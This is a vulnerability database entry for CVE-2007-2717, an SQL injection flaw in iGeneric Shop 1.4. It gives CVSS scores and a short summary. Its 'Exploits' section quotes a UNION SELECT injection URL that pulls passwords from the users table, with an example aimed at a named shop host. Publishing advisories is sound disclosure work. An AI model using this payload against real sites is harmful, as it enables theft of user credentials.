7.5
CVSSv2

CVE-2007-2717

Published: 16/05/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in shop/page.php in iGeneric (iG) Shop 1.4 allows remote malicious users to execute arbitrary SQL commands via the type_id[] parameter, a different vector than CVE-2005-0537.

Vulnerable Product Search on Vulmon Subscribe to Product

igeneric ig shop 1.4

Exploits

Discovered by: gsy & kerem125 Website: wwwkerem125com Script Download: wwwigenericcouk/ig-shopping-carthtml exploit:/shop/pagephp?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/* example:shopigenericcouk/shop/pagephp?page_type=catalog_navigate&type_id[]=-99%20union/**/ ...